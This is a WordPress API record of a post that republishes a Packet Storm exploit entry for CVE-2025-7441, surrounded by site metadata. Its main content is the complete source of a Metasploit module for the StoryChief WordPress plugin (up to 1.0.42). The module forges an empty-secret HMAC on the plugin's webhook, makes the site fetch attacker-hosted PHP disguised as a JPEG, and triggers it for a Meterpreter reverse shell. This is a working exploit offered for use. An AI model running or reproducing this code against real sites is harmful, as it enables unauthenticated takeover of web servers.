{"id":41674,"date":"2026-02-19T11:39:29","date_gmt":"2026-02-19T11:39:29","guid":{"rendered":"http:\/\/localhost\/?p=41674"},"modified":"2026-02-19T11:39:29","modified_gmt":"2026-02-19T11:39:29","slug":"wordpress-storychief-1042-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41674","title":{"rendered":"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:58:26&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in the StoryChief WordPress plugin less than or equal to 1.0.42. The plugin exposes a webhook endpoint at \/wp-json\/storychief\/webhook which accepts a forged HMAC&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215915&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-7441&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      prepend Msf::Exploit::Remote::AutoCheck\\n      include Msf::Exploit::FileDropper\\n      include Msf::Exploit::Remote::HttpClient\\n      include Msf::Exploit::Remote::HttpServer\\n      include Msf::Exploit::Remote::HTTP::Wordpress\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;WordPress StoryChief Plugin Unauthenticated RCE&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module exploits an unauthenticated arbitrary file upload\\n              vulnerability in the StoryChief WordPress plugin \\u003c= 1.0.42.\\n    \\n              The plugin exposes a webhook endpoint at\\n              \/wp-json\/storychief\/webhook which accepts a forged HMAC.\\n              Because the plugin uses an empty secret for HMAC validation,\\n              attackers can compute a valid MAC and force WordPress to\\n              download and store attacker-controlled PHP content inside\\n              the uploads directory, resulting in remote code execution.\\n            },\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;xpl0dec&#8217;, # Original PoC\\n              &#8216;Nayera&#8217;   # Metasploit module\\n            ],\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;CVE&#8217;, &#8216;2025-7441&#8217;],\\n              [&#8216;EDB&#8217;, &#8216;52422&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/Story-Chief\/wordpress&#8217;]\\n            ],\\n            &#8216;Platform&#8217; =\\u003e [&#8216;php&#8217;],\\n            &#8216;Arch&#8217; =\\u003e ARCH_PHP,\\n            &#8216;Targets&#8217; =\\u003e [\\n              [&#8216;Automatic Target&#8217;, {}]\\n            ],\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-08-04&#8217;,\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DefaultOptions&#8217; =\\u003e {\\n              &#8216;PAYLOAD&#8217; =\\u003e &#8216;php\/meterpreter\/reverse_tcp&#8217;,\\n              &#8216;WfsDelay&#8217; =\\u003e 15\\n            },\\n            &#8216;Privileged&#8217; =\\u003e false,\\n            &#8216;Stance&#8217; =\\u003e Msf::Exploit::Stance::Aggressive,\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n              &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\\n              &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION]\\n            }\\n          )\\n        )\\n    \\n        register_options([\\n          OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path to WordPress&#8217;, &#8216;\/&#8217;])\\n        ])\\n      end\\n    \\n      #\\n      # Check Method\\n      #\\n      def check\\n        return CheckCode::Safe(&#8216;WordPress not detected&#8217;) unless wordpress_and_online?\\n    \\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;wp-json&#8217;, &#8216;storychief&#8217;)\\n        )\\n    \\n        unless res \\u0026\\u0026 res.code == 200\\n          return CheckCode::Safe(&#8216;StoryChief REST namespace not found&#8217;)\\n        end\\n    \\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;wp-json&#8217;, &#8216;storychief&#8217;, &#8216;webhook&#8217;),\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;data&#8217; =\\u003e &#8216;{\\&#8221;meta\\&#8221;:{\\&#8221;mac\\&#8221;:\\&#8221;\\&#8221;,\\&#8221;event\\&#8221;:\\&#8221;publish\\&#8221;},\\&#8221;data\\&#8221;:{}}&#8217;\\n        )\\n    \\n        return CheckCode::Unknown(&#8216;No response from webhook endpoint&#8217;) unless res\\n    \\n        return CheckCode::Appears(&#8216;StoryChief webhook endpoint reachable and likely vulnerable&#8217;) if res.code != 404\\n    \\n        CheckCode::Safe(&#8216;Webhook endpoint returned 404. The plugin may not be installed, permalinks may not be configured, or the target is not vulnerable.&#8217;)\\n      end\\n    \\n      #\\n      # Serve malicious PHP payload\\n      #\\n      def on_request_uri(cli, _req)\\n        print_good(\\&#8221;Serving malicious payload to #{cli.peerhost}\\&#8221;)\\n    \\n        php_payload = payload.encoded\\n    \\n        send_response(\\n          cli,\\n          php_payload,\\n          &#8216;Content-Type&#8217; =\\u003e &#8216;image\/jpeg&#8217;\\n        )\\n    \\n        close_client(cli)\\n      end\\n    \\n      #\\n      # Generate JSON body + HMAC\\n      #\\n      def generate_signed_body(remote_url)\\n        body_hash = {\\n          &#8216;meta&#8217; =\\u003e {\\n            &#8216;event&#8217; =\\u003e &#8216;publish&#8217;\\n          },\\n          &#8216;data&#8217; =\\u003e {\\n            &#8216;featured_image&#8217; =\\u003e {\\n              &#8216;data&#8217; =\\u003e {\\n                &#8216;sizes&#8217; =\\u003e {\\n                  &#8216;full&#8217; =\\u003e remote_url\\n                }\\n              }\\n            }\\n          }\\n        }\\n    \\n        json_body = JSON.generate(body_hash).gsub(&#8216;\/&#8217;, &#8216;\\\\\\\\\/&#8217;)\\n        signature = OpenSSL::HMAC.hexdigest(&#8216;sha256&#8217;, &#8221;, json_body)\\n    \\n        body_hash[&#8216;meta&#8217;][&#8216;mac&#8217;] = signature\\n        JSON.generate(body_hash)\\n      end\\n    \\n      #\\n      # Attempt to trigger uploaded shell\\n      #\\n      def trigger_shell(filename)\\n        now = Time.now\\n    \\n        upload_path = normalize_uri(\\n          target_uri.path,\\n          &#8216;wp-content&#8217;,\\n          &#8216;uploads&#8217;,\\n          now.year.to_s,\\n          format(&#8216;%02d&#8217;, now.month),\\n          filename\\n        )\\n    \\n        print_status(\\&#8221;Attempting to execute uploaded payload at #{upload_path}\\&#8221;)\\n    \\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e upload_path\\n        )\\n    \\n        unless res \\u0026\\u0026 res.code == 200\\n          fail_with(Failure::UnexpectedReply, &#8216;Uploaded payload did not return HTTP 200, execution likely failed&#8217;)\\n        end\\n      end\\n    \\n      #\\n      # Main Exploit\\n      #\\n      def exploit\\n        payload_name = \\&#8221;#{Rex::Text.rand_text_alphanumeric(8..12)}.php\\&#8221;\\n        register_file_for_cleanup(payload_name)\\n    \\n        print_status(&#8216;Starting local HTTP server for payload hosting&#8217;)\\n    \\n        start_service(\\n          &#8216;Uri&#8217; =\\u003e {\\n            &#8216;Path&#8217; =\\u003e \\&#8221;\/#{payload_name}\\&#8221;,\\n            &#8216;Proc&#8217; =\\u003e proc { |cli, req| on_request_uri(cli, req) }\\n          }\\n        )\\n    \\n        payload_url = \\&#8221;#{get_uri.chomp(&#8216;\/&#8217;)}\/#{payload_name}\\&#8221;\\n        print_status(\\&#8221;Payload URL: #{payload_url}\\&#8221;)\\n    \\n        request_body = generate_signed_body(payload_url)\\n    \\n        print_status(&#8216;Sending malicious webhook request&#8217;)\\n    \\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;wp-json&#8217;, &#8216;storychief&#8217;, &#8216;webhook&#8217;),\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;data&#8217; =\\u003e request_body\\n        )\\n    \\n        fail_with(Failure::Unreachable, &#8216;No response from target&#8217;) unless res\\n    \\n        unless res.code == 200 \\u0026\\u0026 res.body.include?(&#8216;permalink&#8217;)\\n          fail_with(Failure::UnexpectedReply, \\&#8221;Unexpected response (#{res.code})\\&#8221;)\\n        end\\n    \\n        print_good(&#8216;Webhook accepted payload \u2014 attempting execution&#8217;)\\n    \\n        trigger_shell(payload_name)\\n      end\\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215915&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215915\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:58:26&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in the StoryChief WordPress plugin less than or equal to 1.0.42. The plugin exposes a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-41674","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41674\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:58:26&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in the StoryChief WordPress plugin less than or equal to 1.0.42. The plugin exposes a...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41674\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-19T11:39:29+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41674#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41674\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915\",\"datePublished\":\"2026-02-19T11:39:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41674\"},\"wordCount\":1038,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41674#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41674\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41674\",\"name\":\"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-19T11:39:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41674#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41674\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41674#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41674","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:58:26&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in the StoryChief WordPress plugin less than or equal to 1.0.42. The plugin exposes a...","og_url":"https:\/\/zero.redgem.net\/?p=41674","og_site_name":"zero redgem","article_published_time":"2026-02-19T11:39:29+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41674#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41674"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915","datePublished":"2026-02-19T11:39:29+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41674"},"wordCount":1038,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41674#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41674","url":"https:\/\/zero.redgem.net\/?p=41674","name":"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-19T11:39:29+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41674#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41674"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41674#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 WordPress StoryChief 1.0.42 Shell Upload_PACKETSTORM:215915"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41674","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41674"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41674\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41674"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41674"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41674"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}